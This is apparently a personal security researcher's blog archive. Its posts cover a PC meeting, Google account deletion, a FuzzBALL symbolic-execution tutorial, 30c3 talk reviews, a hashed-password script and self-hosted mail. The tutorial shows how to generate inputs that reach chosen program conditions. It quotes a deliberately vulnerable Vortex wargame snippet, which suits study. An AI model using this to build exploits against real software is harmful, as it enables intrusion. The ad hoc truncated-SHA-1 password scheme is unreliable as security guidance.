Overall the discussion of my papers went well. The overall PC meeting went for roughly 8 hours with only a short lunch break in between. The discussion was always on a very high level and it was great to see so many great minds running in lockstep, discussing pro and contra arguments. In the end, there was only one paper where there was a disagreement in the PC if we should accept or reject the paper and this conflict was solved by a democratic vote.

Some of the (sometimes obvious) lessons I have learned during this discussion are:

PC meetings are a great place to network. For me it was a huge chance to actually meet with many more senior people in academia and industry. It was interesting to bring in my expertise and ask them about their thoughts (both about the places where they work and their decision whether to choose academia or industry).

The double blind review process is really double blind. This fact actually surprised me a little as I thought it would be handled in a more lax fashion. For most of the papers I reviewed I had no clue about who the authors could be and Erez and Dan did a great job in keeping the discussion straight on the technical contributions of each work. I only saw the authors of the accepted papers a couple of days after the PC meeting after we have all finished revising our reviews.

The discussion itself is surprisingly open and honest. Nobody was pushing their own work and all papers were evaluated in a fair and objective way. Even though I was one of the academically youngest people, I was taken serious during the discussion. Somewhat surprisingly I was not just a silent listener but an active participant that was frequently asked about his opinion.

I liked the fact that the reviewer with the best evaluation had to summarize the paper and all other reviews at the beginning of each discussion. This gave me the opportunity to push the papers I really liked.

All in all, I must say that I really enjoyed my first real PC meeting. I learned first hand how these things work and Erez and Dan did a great job in leading the meeting and discussion while Martin did an awesome job at organizing the meeting (and the following dinner).

A walkthrough for a difficult point and click adventure or deleting a GApps domain and all Google services

2014-01-22T00:00:00-05:00

A couple of months ago I left the Google cloud and I have been happily using my own services since then. My mailserver runs well and apart from the odd email that does not get through because the origin domain is a registered SPAM sender according to one of the blacklist (happened to two emails so far) and one email that was just way too big (15MB of photos). The synchronization of calendar and my contacts works well with all my laptops, notebooks, desktops, and the odd Android device. Many things actually got much better: I have (much) faster search (and I can use boolean operators - yay!); offline support for email finally works well enough to actually work; outgoing messages are signed; and did I say that it's actually much faster?

The only thing left on Google was my Google scholar profile. Today I wanted to move this final last piece and remove the Google Apps account for my old domain. I felt that my own cloud was a much better substitution for the services that Google offered and that I would not need to fall back to GApps. So I went off to delete the account, believing that Google would be a good guy like they promise and let me delete my account in an easy process.

First off, taking out all your data is a pain and you have to reserve at least a couple of days if you want to pull a backup before deleting the account. The Google takeout crashed several times (on the Google side), so all I got was a non-descriptive error message that told me something failed on their side. After the 4th or 5th try they managed to keep the job running long enough so that I could pull the zip file - which I hopefully don't need but better one backup too many than one too less.

Then I set off to delete the GApps account this morning, trying to follow their suggestion on the forum (well, I actually tried figuring it out myself but there are just too many confusing options - almost like the Facebook privacy settings). So I logged into the admin portal and tried to find the option to delete the GApps account for my domain.

The help page was actually way out of date and was written for the admin console they had roughly around 2010, so none of the names they mentioned existed any more. I kept searching for some time until I found that the gear icon on the upper right showed "setup" as the only option. Well, it looks like I have to setup this new console. So I clicked through the setup process (trying to deselect as many services as I could). After going through the setup process of the new console I had a second option under the gear icon that allowed me to switch back to the old console view.

At this point in time it started to feel like one of these old point and click adventures (e.g., Monkey Island or Myst) where you're trapped somewhere and you need to fulfill a task. So I continued my journey.

I followed the help page (which is written for the old console view that you can only activate if you go through the setup process for the new console view that you'll only find if you click on the setup link when you open the gear icon, modulo one or two logouts/logins). And I finally found the "delete this account" link.

But behold, the journey is not over yet. Because you actually cannot click on this link. There is some text in small font that tells you that you have to unsubscribe from GApps first, before you can delete the domain account (which is not mentioned in the help). So I followed through to the next level and unsubscribed my admin account (the only account left in the domain) from the GApps services. This promptly dropped me to a couple of internal server error pages and logged me out of the GApps admin panel.

When I signed in again (using the same login and password which tells me that Google did not really delete my account), I had to agree to the Google EULA and a couple of other things and solve a captcha. I like these mini games in adventures.

After successfully logging back into the admin console I was able to switch to the classic view and navigate back to the delete this domain link. And lo and behold this time the link was active and I was able to (hopefully?) delete the admin account for the domain, and the domain account.

All in all, I have to say that this was one of the tougher adventures I had to solve, especially as I expected an easier path. Looking back I should have taken pictures for each step. I wonder what all the UI designers at Google do all day long when their admin interfaces are so convoluted and crappy. But well, maybe the just want you to have fun with their adventures and mini games.

Having phun with Symbolic Execution (SE)

2014-01-14T00:00:00-05:00

This year at 30c3 I gave a talk about triggering deep vulnerabilities using symbolic execution. The talk gives an overview about symbolic execution and shows how you can use symbolic execution as a new tool in your reverse engineering toolbox. Let's say you have a specific location in a binary and you want to know what kind of input can trigger a specific fault at that location. If you configure it correctly then symbolic execution can help you find that input.

This post starts with a general description of what symbolic execution is and then goes into detail on how to install FuzzBALL, our symbolic execution engine. In the end I present some examples how you can use FuzzBALL (which is a fairly complex tool and new users usually have a rough start).

Symbolic Execution (SE)

Symbolic Execution, or SE for short is an alternate way to execute code (programs, binaries, drivers, or even full operating systems). Instead of using specific concrete values, SE uses abstract, symbolic values for register and memory values. Operations on these values are carried along the symbolic execution of the code. Think of symbolic execution as a form of execution that concatenates the different computations on a value into a long formula.

At decision points or control flow transfers that depend on symbolic values (e.g., conditional jumps when the flags depend on symbolic values, or indirect control flow transfer when the address or pointer is symbolic) symbolic execution must follow all possible paths. For conditional jumps, the symbolic execution engine splits the execution into two paths. On one path the SE engine assumes that the branch condition is true and on the other path the SE engine assumes a false branch condition, extending the symbolic formulas with this information.

The SE engine proves that a specific condition is true at a specific location. When using SE, the programmer encodes a set of conditions that should be reached at one or more locations. If the SE engine finds a symbolic input that satisfies the condition then it can calculate one or more possible concrete inputs that trigger the vulnerability condition by solving the path formulas.

A common problem of SE engines is the limited scalability. Due to the exponential path explosion explained above (at each conditional branch that depends on symbolic input the number of paths is doubled) the number of symbolic input bytes and the amount of code that can be executed symbolically is limited.

Different SE engines

Several different SE engines exist and they are all tailored to different use cases. FuzzBALL is a SE engine that can be used to execute arbitrary binary code. At the core, code is translated into a high-level intermediate representation (using VEX and Vine) and conditions can be encoded on the binary level. FuzzBALL is used to generate proof of concept exploits (an input that triggers a bug) given a vulnerability condition in the application. KLEE is a SE engine that compiles programs into LLVM intermediate representation (therefore relies on the source code of the application) and tests if it can trigger a vulnerability condition. KLEE is used to find bugs in applications. S2E builds on KLEE and selectively executes large systems symbolically. The goal of S2E is similar to KLEE but on a larger scale (in the amount of code that is executed in one instance, KLEE can be used for large scale analysis where a large set of smaller programs, e.g., the binutils can be analyzed), with its main contributions in choosing which path to analyze. Next to these three systems there is some prior and a lot of follow up work. The goal of this blog post is not to go into too much details but the interested reader can take the FuzzBALL, KLEE, and S2E papers as a start and explore from there.

I just highlighted 3 different SE engines and there are many more. In addition, many engines support different SMT sovlers that can also be tailored to different use cases. Just the question of choosing the right SE engine for a task would merit a couple of blog posts.

Setting up an SE environment

For the rest of this blog post we will concentrate on the FuzzBALL symbolic execution engine (the one I know best). FuzzBALL currently runs on any x86-32 system (or x86-64 with x86-32 backward compatibility libraries) and is easy to set up on any Debian-based host. You can also follow the great INSTALL file in the FuzzBALL repository.

Use the following magic commands to install the necessary build tools:

$ sudo apt-get install build-essential valgrind qemu binutils-multiarch \
                       binutils-dev ocaml ocaml-findlib libgdome2-ocaml-dev \
                       camlidl libextlib-ocaml-dev ocaml-native-compilers \
                       libocamlgraph-ocaml-dev libsqlite3-ocaml-dev \
                       subversion git libgmp3-dev automake
$ sudo apt-get build-dep binutils-multiarch ocaml

Download a set of necessary repositories:

$ cd ~; mkdir SE; cd SE
$ git clone https://github.com/bitblaze-fuzzball/fuzzball
$ svn co -r2737 svn://svn.valgrind.org/vex/trunk vex-r2737
$ cd vex-r2737; make -f Makefile-gcc
$ cd ..
$ svn co -r1673 https://svn.code.sf.net/p/stp-fast-prover/code/trunk/stp  stp-r1673
$ cd stp-r1673; patch -p0 <../fuzzball/stp/stp-r1668-true-ce.patch
$ ./clean-install.sh --with-prefix=$(pwd)/install
$ cp install/bin/stp install/lib/libstp.a ../fuzzball/stp
$ cd ../fuzzball
$ ./autogen.sh
$ ./configure --with-vex=`pwd`/../vex-r2737
$ make

And you should be done and have a readily compiled version of FuzzBALL with all the libraries you will need for x86-32 symbolic execution.

Now download and install the examples from here and unpack them in our playground:

$ cd ~/SE; mkdir playground; cd playground
$ wget -c https://nebelwelt.net/blog/static/2014/0114/SE-testbed.tar.bz2
$ tar -xvjf SE-testbed.tar.bz2

Our first symbolically executed piece of code

Now after we have initialized and compiled our execution environment it's time to execute our first piece of code symbolically. Enter the SE directory and change to the first code example:

$ cd ~/SE/playground/simple
$ make
$ ./run_se.sh

What's actually happening there? Well, let's start with the actual code:

#define MAGIC 42
// add some concrete values into the process memory
char arr[256];
for (i=0; i<256; i++)
    arr[i] = i;
// buf0[0] is symbolic
// copy the concrete value from arr[symb] into buf0[42]
buf0[42] = arr[buf0[0]];

// check if the copied value was the magic value defined above
if (buf0[42] == MAGIC) {
            printf("Correctly recovered value 42\n");
}

So, if we assume that buf0 is symbolic and somewhat input dependent then what kind of values do we need to place in buf0[0] to trigger the printf statement. This example may look a little bit hypothetical and constructed (and it is) but it illustrates an interesting use case for FuzzBALL. We have some (binary) program and a pre-defined condition that we want to trigger. The FuzzBALL SE engine is then used to produce a concrete input (e.g., a specific memory buffer, or a file) that triggers the pre-defined condition.

FuzzBALL supports a large set of configuration and runtime options and I invite you to look at them using ./fuzzball/exec_utils/fuzzball -h. In our example directory we have conveniently set up a config file and a run script that then uses this config file. In the config file we specify the locations and basic settings for FuzzBALL. In the run script we specify the runtime configuration for FuzzBALL. For the simple example we use the following parameters:

-random-seed $NUMBER (FussBALL uses random values, a common seed makes the choices reproducible)
--solver stpvc (we use the STP constraint solver)
-linux-syscalls (we emulate linux system calls)
-fuzz-start-addr (concrete execution until SE starts at this address)
-fuzz-end-addr (SE ends at this address)
-symbolic-region 0xc0fe0000+1 (one symbolic byte at address 0xc0fe0000)
-check-condition-at (encodes the location and the condition)
-finish-on-nonfalse-cond (let's stop SE if we find a satisfying input)

The most important arguments are fuzz-start-addr, fuzz-end-addr as they set the constraints where the magic happens and symbolic-region which defines what values are tracked symbolically and not concrete.

The condition is checked at a specific location (or at multiple location) and can check the values of registers or memory locations. In the simple example we use "0xc0de:R_EAX:reg32_t == 0x2A:reg32_t". This condition checks if the 32-bit register EAX contains the 32-bit value 0x2A when the instruction pointer is at the location 0xc0de. You can play around with the conditions and look at the machine code of the simple example as well (objdump -d ./simple). Play around with some FuzzBALL options and try to trigger different values or different conditions.

Getting a little help for some Vortex wargames

The Vortex wargames are an awesome way to learn more about system security. In a bunch of different levels you learn about different aspects of system security and software vulnerabilities. You have to understand the concepts, write some code, and exploit these vulnerabilities to reach levels higher up. I really recommend that you try them out to see how far you can go.

For some of the levels SE can be used to simplify the process of exploiting the given vulnerabilities (some jokingly say without even understanding the core vulnerability). In this part we look at Vortex level 01 where we have a simple program that reads some input from stdin:

unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
...
while((x = getchar()) != EOF) {
  switch(x) {
    case '\n': print(buf, sizeof(buf)); continue; break;
    case '\\': ptr--; break;
    default: e(); if(ptr > buf + sizeof(buf)) continue;
             ptr++[0] = x; break;
   }
 }

The experienced hacker will see that this code defines a simple state machine that can be used to trigger the vulnerability condition hidden in e(). But let's try not to think too hard and use a brute-force SE approach.

We setup the SE engine in playground/vortex:

$ cd ~/SE/playground/vortex
$ make
$ ./run_se.sh

If your GCC decides to use a weird stack layout (well, some GCC optimizations tend to reorder the variables on the stack, mitigating the intended exploit) then you can use my precompiled versions of the binaries (static-vortex and run_se-static.sh).

We have modified the original vortex source code in some small places. The sestart and sestop function calls are added to make the binary grepable (the only purpose is that your gcc might generate different code and the call to these non inlineable functions allows me to more conveniently search for the SE start address). Also, we made the buffer smaller, reducing the hardness of the problem. We can then use the SE generated result to abstract the solution and adapt it to larger buffers as well (or we let the SE run for a longer amount of time). This example already gives us a good overview of the scalability issues that SE faces and if we use more than 10-20 symbolic bytes then we reach the scalability boundaries.

I don't want to spoil the fun too much and give you the exact results, so I hope that you play around a little with the binaries and enjoy solving this vortex level.

Splitting SE along transformation boundaries: PDF encodings

The last example takes a real program that we have only in binary form. We look at a binary that decodes a HEX string first and then does a RLE decompression on the output of the first transformation. The code would look a little bit like:

ASCIIHexDecode(buf0, len0, buf1, 4096);
if (RunLengthDecode(buf1, len1, buf2, 4096) != -1) {
  if (strncmp(argv[3], (char*)buf2, strlen(argv[3])) == 0) {
     buf0[len0] = 0;
     buf1[len1] = 0;
     buf2[strlen(argv[3])] = 0;
     printf("Correctly recovered str\n");
  }
}

In the binary we have two transformations: one that decodes HEX strings and one that decompresses RLE encoded buffers. These transformations are implemented just like the PDF specification recommends them and the fun thing is that PDF allows recursive encodings, so an object inside a PDF file can be encoded using a set of transformations and may include other PDFs as well.

Reversing all transformations in one large step is usually not feasible for SE because of the state explosion. There are just too many symbolic bytes to carry along and too much state that accumulates. But single transformations are completely in the scope of transformations. In the HICFG paper, the first TR, or the second TR we define an analysis technique that allows a concretization of symbolic values at transformation boundaries, minimizing the state that needs to be carried from one transformation to the other. If you are interested in the details then I'd advise you to read the papers. On a high level, we split a large single SE computation into several smaller SE computations with intermediate concrete execution steps.

Looking at our binary we can define two transformations, reversing the RLE encoding first and the HEX encoding in a second step. This allows us to define a target string that is then RLE compressed and HEX encoded using the RLE decompression code and the HEX decoding code.

You can execute the example as follows:

$ cd ~/SE/playground/hexrle
$ ./run_se.sh

Again, I invite you to look at the individual files, play around with them, peek into the binaries using objdump and have fun with the SE engine.

Wrapping up

In this blog post I've given you a gentle introduction into symbolic execution, how you can use symbolic execution to reverse engineer a given input that triggers a condition of your choosing and how you can optimize the SE process to scale to a larger amount of symbolic input bytes. I hope you enjoyed the read! I'm always happy about comments, feedback, or questions. You can find me on twitter or just send me a mail.

30c3, a log of the 30st chaos communication congress

2013-12-30T00:00:00-05:00

The same procedure as every year

In the last 10 years I visited the chaos communication congress 9 times (at the beginning of my first talk I wrongly stated that it was my 10th visit in 11 years, I stand corrected) and year after year my friends and I had an awesome time. After missing the 29c3 in 2012 due to having recently immigrated in the US I really wanted to go to the 30c3. These hacker congresses are an awesome opportunity for researchers to synchronize with other hackers and to exchange and discuss new ideas for future projects. I also enjoy syncing up with all my friends that I happen to meet at the c3 between x-mas and new year's eve.

Getting there and exploring the new location

As I was already in Europe to visit family over x-mas getting there was fairly easy with just one short direct flight of about an hour. Hamburg is a great and location and the airport is just a short train ride from the city center (almost comparable to Zurich). The chaos communication congress moved from the BCC (Berlin Congress Center) in Berlin to the CCH (Congress Center Hamburg) in Hamburg in 2012 and this was the second time at the newer, bigger location that would not be too small or two crowded for the next several years. First of all, the location is much bigger and many things changed compared to the BCC. It is no longer a cozy, familiar atmosphere like in the old days of the 21c3 or so. There are roughly 10k hackers, nerds, journalists, and other agents walking around and if you don't know people already it is kind of hard getting to know them. Comparable to defcon the 30c3 has become more of a privileged event with different classes and due to the sheer size you tend to stick to the people you already know. I still met a bunch of new people and I also tried to get to know a bunch of other random people as well but I felt that it was getting harder.

Regarding the new location I must say that I like the CCH. It took me the better part of the first day to find my bearings but navigation was smooth afterwards (i.e., I could just follow the tubes for the Seidenstrasse project, a large, ad hoc pneumatic delivery system). Maybe for future events the c3 organizers should add (more) routing signs for newcomers, especially if it gets even more crowded.

Technical talks

In this section I want to highlight a bunch of technical talks I watched during the 30c3. There were way too many good talks to list all of them here and there is not enough space to write about all of them in detail. My intention is to encourage you to follow the links and to watch the talks as well. The talks are rated from 1 (bad, don't watch) to 10 (awesome, you have to watch this immediately). My talks are marked ?; obviously my opinion is that they are great but I'll let you judge them for yourself.

An introduction to firmware analysis: Stefan Widmann (4)

In this talk, Stefan gives us a quick and dirty overview of different firmware analysis tools and individual steps needed to recover, analyze, and disassemble firmware of an unknown device.

Triggering Deep Vulnerabilities Using Symbolic Execution: gannimo (?)

Symbolic execution is a great tool that can be used to help a programmer find some input that will trigger a well defined condition inside a binary program. In this talk we learn the concepts of symbolic execution, potential use cases, and how far we can scale symbolic execution (i.e., for what tasks it is feasible).

Mobile network attack evolution: Karsten Nohl, Luca Melette (6)

Another iteration of the security in mobile networks topic by Karsten and Luca. The talk was entertaining and interesting while they did not present too many new things.

Bug class genocide: Andreas Bogk (7)

Andreas fights for memory safety guarantees for low level languages. He took some time to tell us about all the possible memory corruption vulnerabilities that exist in low level code and advocates to use compiler extensions like SoftBound+CETS that enforce (some form of) memory safety for C and C++. Currently he is working on porting FreeBSD (and SoftBound+CETS) to offer a safe version of the FreeBSD distribution where memory corruption is no longer possible. Unfortunately, this will cost some runtime performance and while he was not explicit about the overhead, the original papers mention up to 300% runtime overhead.

Baseband Exploitation in 2013: RPW, esizkur (4)

Baseband chips and operating systems changed a lot in recent years. Most new mobiles and smart phones produced in recent years run on Qualcomm chips. Exploitation of these systems got much harder due to additional security hardening of the operating system and a change of the CPU architecture. This talk explains how we can still hack these systems.

Revisiting "Trusting Trust" for binary toolchains: sergeybratus, Julian Bangert, bx (9)

I must say I love Sergey's talks (especially the ones at the c3), they are always fun, usually go several layers down into the system architecture, and I always learn something new. This time Sergey and his companions talked about Turing complete computation using only ELF relocations. Using different forms of relocations you can force the standard loader to rewrite partial relocation entries and force additional relocations ending up in Turing complete modifications of the program during the loading process (i.e., after verification but before the first instruction of the application is executed).

Security of the IC Backside: nedos (4)

Nice overview talk about reverse engineering and attacking integrated circuits from the backside. Instead of going down from the top (facing potential reverse engineering counter measures) one can start from the bottom and go up the layers. This talk gives an introduction into this reverse engineering process.

SCADA StrangeLove 2: repdet, sgordey (3)

SCADA is still bad, m'kay. New examples of how bad SCADA systems are in the real world, including some details on SCADA systems that are connected to the internet and are openly accessible.

Android DDI: Collin Mulliner (5)

Android reverse engineering is a potentially hard problem due to the mix of native code and Dalvik bytecode. This talk presents an approach to instrument the Dalvik part of an Android application with some additional features. In the talk Collin gives some nice examples on how to circumvent in-store purchases resulting in free stuff.

Persistent, Stealthy, Remote-controlled Dedicated Hardware Malware: Patrick Stewin (5)

In the beginning malware executed on the same privilege level as the anti-malware software. Over time, the anti-malware software tried to move up on the levels of abstraction (and privileges) to keep control even if the malware was able to successfully gain control of one privilege level. In this talk we learn that malware may move up to the hardware level, circumventing all possible protection mechanisms.

WarGames in memory: gannimo (?)

In my second talk I discuss memory safety violations in general and memory corruption vulnerabilities in particular. At the core, memory safety violations are the cause for many of the exploitable bugs in programs written in low level languages like C or C++. In the talk we discuss a model on what kind of capabilities an attacker needs to execute a control flow hijack attack (starting with the initial memory safety violation). In the later part we discuss different strategies that would stop the attack from succeeding, why current defense mechanisms are not sufficient, and what the future will bring us.

Virtually Impossible: The Reality Of Virtualization Security: Gal Diskin (6)

Going down the ISA rabbit hole. Gal lectures about low level security implications that virtualization will bring us and what kind of pitfalls we face when using different virtualization technologies. Hardcore talk with lots of low-level details.

CounterStrike: FX (7)

I wondered for a long time if I should order this talk under the political/social talks or under the technical talks. FX delivers a great rant about lawful interception, how governmental tracking works, and what we might be able to do about it. Not his best talk but greatly entertaining.

Talks I have not watched yet

Due to the tight schedule this year I missed way too many great talks. Luckily all the talks were recorded and will be made available in the next couple of days (so expect a follow up blog post on other watchful talks).

A (short) list of the many talks I want to watch in the next weeks include:

The Year in Crypto: Nadia Heninger, djb, Tanja Lange
Hardware Attacks, Advanced ARM Exploitation, and Android Hacking: Stephen A. Ridley
Fast Internet-wide Scanning and its Security Applications: J. Alex Halderman
Security Nightmares: frank, Ron
and probably all other technical talks in due time.

How to choose secure passwords for insecure websites

2013-11-18T00:00:00-05:00

Too many accounts

Most websites require an account to access even basic functionality and therefore need a dedicated password. A simple idea would be to reuse one single password for all these low-security websites but this is (i) insecure as it reduces the security of all your accounts to one single compromised account and (ii) many of these websites have different password requirements (e.g., different length, combination of upper and lower case, or even special characters). An other convenient alternative is to use a synchronized password manager that stores your passwords somewhere in the cloud. One still has to choose a new, secure password for each website but the cloud (e.g., Google Chrome or Mozilla's Firefox) will take care both of the synchronization across devices and backups. The disadvantage of password managers is that the password manager is now trusted and the cloud provider (often) has power over all passwords. If the password manager is compromised then all accounts are broken.

Customized passwords

A simple alternative I've used for some time now (for insecure websites) is concatenating the domain name of the website with a common shared password (e.g., "nebelwelt.netSharedKey"). This way, each website has its own dedicated password and the passwords are easy to remember. I've used this approach for all my 'insecure' websites that just forced me to register an account to access basic functionality and where I did not want to bother with a secure password.

Unfortunately, the security of all accounts depends on one plaintext password offender (one website that stores the password in plaintext) or one website with a weak hash algorithm that is reversible. In my case, I got burned by the big Adobe breach (I was forced to generate an Adobe account when I wanted to download an ebook from my local library because the ebooks are all protected with DRM crap - torrenting the books would have saved me from changing all passwords but that's another story). My shared password itself is pretty long and contains letters, numbers, and special characters so I assume that it will hold out for a bit but I still had to change all passwords for good measure.

Hashed passwords

To mitigate and protect from the single offender problem an attacker should not be able to guess the (obvious) shared password and domain part from just one single recovered cleartext password. Cryptographic hashes are a perfect one way function that accomplishes that task. The "echo -n nebelwelt.netSharedPassword | sha1sum | xxd -r -p | base64 | colrm $length+1" simple shell command generates the sha1 hash of the concatenated string, reencodes it from base16 to base64 to increase the amount of different character used, and cuts it down to the required length. Such a generated password will have very high entropy (in the base64 charset) and even shorter password should be more secure than any word combination you might choose yourself (combination of word lists is not as random as you might think) or 'random' letters you choose yourself as humans do a really bad job as random number generators. If the website requires a special character I just append an exclamation mark at the end (as my password already has high enough entropy I do not care about the couple of bits added through special characters).

If an attacker recovers one single account password all other passwords are still safe while it is still an easy scheme to remember. The only drawback is that instead of just concatenating the domain name and the shared key in the head I now have to run a quick shell command.

While this solution is not perfect I only have to remember one single password for all low-security websites and I only need access to a simple terminal to recover a password. Advantages are that neither do I need to trust a password manager nor can an attacker compromise multiple accounts from one single leaked password (oh, and as a pro tip: add an " " before the shell command so that your password does not end up in the bash history file).

#!/bin/bash
[[ -n "$1" ]] || { echo -e "usage: give domain name to make hashed password. \n\n
Example:\n
./passhash nebelwelt.net 8\n
"; exit 0;}

len=$2
key=YourSecredSharedPassword
[[ -n "$2" ]] || len=8
echo -n $1$key |sha1sum | xxd -r -p | base64 | colrm $(($len+1))

The day (or week) I left the Google cloud

2013-10-05T00:00:00-04:00

Let me start with a couple of reasons and motivation first

Roughly 3 1/2 years ago I switched from a self-hosted service (mainly email, anti-spam, and some squirrel-mail based webmail service) to the Google Apps for your domain cloud. Back in the days the service was still free for non-organizational entities and switching itself was fairly easy. The cloud promised and offered so many nice things like (i) no more time spent for server administration, (ii) more services, all of them for free, (iii) better, faster, shinier web interface, and (iv) integration with mobile devices. Incidentally, 3 1/2 years ago was right when I got my first real smartphone (an HTC Desire, which is roughly equivalent with the Google Nexus) a couple of months before I started my Google internship in the safe-browsing team (fighting malware and phising). Life was great and dandy, the services were up and running and I quickly got used to the blazingly-fast (at that time) web interface. I happily used GMail, Blogger, and a couple of accompanying services for roughly 2 years then more and more glitches and other quirks started to annoy me.

Some of the reasons why GMail is no longer a lean, fast service are:

GMail is BIG, every time you log in a couple of megabytes of data need to be transferred before you even see the mail interface. This is especially a pain when you're using a 3G link.
It's about the UI (I don't want Google plus notifications ballooning up and Google hangouts fighting for my screen real estate, I want a fast email client).
Tons of crashes and glitches (yeah, I'm talking about you hanging hangouts).
Missing features for some countries (e.g., YouTube never rolled out for some European countries, e.g., Liechtenstein; therefore if my parents are logged into their GApps accounts then they cannot watch YouTube, all they get is an obscure error message blaming the administrator, or difficulties sending a hangout invite between a GApps domain and a GApps for universities domain)).
Google dropping XMPP support when moving from GTalk to Hangouts.
I started to get annoyed when Google dropped support for Google Reader which I replaced with a version of TinyTinyRSS running on my own server.
and most important of all: I want to have control over my data (and privacy - as far as this is still possible).

Running my own servers allows me to go back to signed (and encrypted) emails, allows me to backup my own email, and to make sure that nobody else logs onto my server and reads my raw data.

Preparation

Switching EMail providers is not an easy task (if you want to keep your EMail address). The task becomes exponentially harder the more services you want to migrate and to keep running. The services I am interested in are: IMAP (for EMail), contacts and calendar via carddav and caldav (for mobile support) and some web client to access my mail on the go. The tempting setup that Google offers is hard to drop and harder to replace. There is no open-source solution that provides all these services out of the box (except if you sacrifice all your security considerations and install a large blob of PHP files on your server that will wreck havoc on all your data). As I wanted to increase my privacy (and privacy can only be built on top of security) I had to roll my own setup.

After looking at current mail servers, web clients, calendar, and contact software (the last time I had my own server I used courier for imap, qmail for smtp, sqwebmail for on the go webmail, and a simple spamassassin to kill spam) I decided on the following setup:

Postfix for full blown SMTP capabilities with all the bells and whistles (plus it's much easier to configure than qmail).
Dovecot for IMAP (whereas IMAPS with a CaCert-signed certificate is preferred).
Roundcube for email access over https.
DaviCal for calendar and contacts.
Postfixadmin for simple administration of virtual domains, mailboxes, and aliases with a MySQL backend; the login credentials are shared between all the services (I did not want to keep a separate user database for each service).
Spamassassin, ClamAV, Amavisd, and postgrey to fight spam.

What is currently missing is a chat server; I looked into ejabberd and was actually quite happy with the software running on the server side. My intention was to replace Google Talk/Hangouts with a Jabber client but during testing I discovered that no single current client in the Debian weezy repository (my current Desktop) supports video/audio chats between two clients; even if the clients run the same software. I did not even get to testing interoperability between clients or operating systems or extended features like multi-party hangouts. I considered using a SIP server like Asterisk for a short while but did not want to go into the hassle of configuring a full blown PBX/call server.

The Setup: Server Side

Our server (currently) runs Ubuntu LTS 12.04 and all the needed software and packages were already available in the main repository (so there's no need to install extra, untrusted packages).

You can basically follow one of the many great howto's that are out there, e.g., the one on Ubuntu help.

What I had to learn in the process of setting up this mailserver was that running a secure mailserver became much more complex in recent years. Nowadays you don't only have to run your SMTP server and your IMAP or POP3 service but also Spamassasin, virus check, greylisting, integration between services, and other stuff. In addition to all the services described in the howto, I also added SPF entries to my DNS and started signing outgoing emails using DKIM (provided by the openDKIM package) and Roundcube with IMAP authentication. The other additional service I'm running is DaviCal with IMAP authentication to support both CalDav and CardDav services for my clients with the same login credentials as my IMAP server.

The Setup: Client Side

On the client I decided for a simple email/calendar/contact client that supported offline mode. I quickly looked into mutt but after 2-3 hours of configuration hell and not being able to figure out just the right shortcuts I settled for evolution as the main client. I keep all calendar and contact information on my local disc, email is downloaded using IMAP and cached locally as well. To keep calendar and contacts in sync across multiple devices I use syncevolution with the webdav backend.

Running in Production

I am now closing in on my first week without Google (or only using Google as an interim fallback if I'm unsure if something did not work, especially for calendar and contacts). So far I did not have any bad experiences except the one odd weird mail that I sent to some colleagues during testing or that I had to flush all contacts and calendar events 3 times when I messed up the import. Otherwise services have been running smoothly and I did not loose any data (neither old email, contacts, or calendar events).

The hardest part (except from setting up all this mess) is switching from the well-accustomed Google user interface to let's say evolution. In my opinion, the biggest change is going back to an old-school email client and in the last week I longed several times for the GMail-like threaded view where my answers are not just stored in the sent folder but also in the threaded views so that I can quickly view my answer to given open questions and discussions.

Conclusion

Going Google-less is possible but it is not easy. Setting up your own mailserver and testing the whole system will take you 3-4 full days and even after investing that much time you will not have all the convenience that the Google cloud offers. There will be delays, your email will not be as snappy as GMail (the average request might take a little longer but at least to my experience there are no big spikes of latency like the ones that Google sometimes has).

Things I really like are that I am now in full control over my data, I can run my own backups of the full configuration and of my emails (which I do daily), I can sign my emails (especially after the NSA revelations signing got a bit more common), and only the people I share my calendar and contacts with get access to my calendar and contacts. In addition, if we send email between accounts on our server nobody else is able to read these emails which is at least a step towards more privacy.

Gasland: worst documentary of all time?

2013-08-13T15:14:00-04:00

Why does Gasland have a rating of 7.7 on IMDB? We tried watching that movie yesterday but it was so terrible bad and suggestive that we had to stop after 10 minutes.

Don't get me wrong, I'm totally in favor of protecting the environment and carefully (and conservatively) looking at possibilities how to extract resources so I would be the perfect watcher for this movie. But the "journalist" (aka the weird dude that felt he had to make a movie without any other credentials) was completely unable to convince us of his story.

First of all, the investigative journalist started with his own story on how these evil companies are trying to buy the claim on his land to frack natural gas out of the ground (that's were he's already saying that we all know that all these big companies are bad and evil - everybody fears the large unknown and what they'll do). The movie (I would not call it a documentary) continues with him driving around for hours (in a car, running on lots of fuel; in addition, he lives in a typical american house with thin wood as outer walls and apparently no insulation - so he depends on lots and lots of gas) calling up random people that already sold their claim and were burnt by the "company" in one way or another. These people tell us how they got sick after the company fracked the gas out of the ground and that their water is now bad. The "journalist" tries to convince us by showing a list of chemicals that they might use but he never does an analysis of the water that these people drink. All in all it looks like all these hillbillies that fight against mobile antennas because of the bad electromagnetic fields that disturb your brain patterns (yeah, right). At one point in time (shortly before we stopped watching) he went to a family that claimed that the can set their water on fire. He talked about it for a couple of minutes but never showed it, only saying that it "could" work. In summary we can say that the movie consists of a weird guy living in the woods that feels threatened by big companies that might or might not do evil stuff- the movie does not help with this decision. He drives around and talks to other dropouts how they feel about the drilling companies as new neighbors (remember, many of them got huge lumps of money for the selling the drilling claims on their land). We learn that they feel concerned and that there might or might not be a problem with the water. If Gasland were a movie I would rate it as 3/10 due to the bad plot; but as it wants to be a documentary about fracking that completely fails to do even basic research and only asks suggestive questions ("do you think that the water is bad?" "yes" "do you think the water made you sick?" "yes" "do you think the big companies are trying to extract all the money they can and hurt your health?" "yes") I can only give it a 1/10 as a documentary. The only good thing about the movie were the one-off nature shots that looked nice.

FreedomPop Overdrive: first thoughts

2013-05-08T05:38:00-04:00

Roughly two weeks ago I received an email that stated that FreedomPop coverage is now available in my area. I've been curious about this company for a while as they offer "free" internet access using several 3G/4G devices. Until recently they only offered 4G connectivity using the ClearWire 4G network that is only available in larger cities (and here in the bay area ClearWire coverage ends roughly in Berkeley, 1 mile short from our home). Since a couple of weeks (say April 2013) FreedomPop peers with Sprint and offers combined 3G/4G coverage.

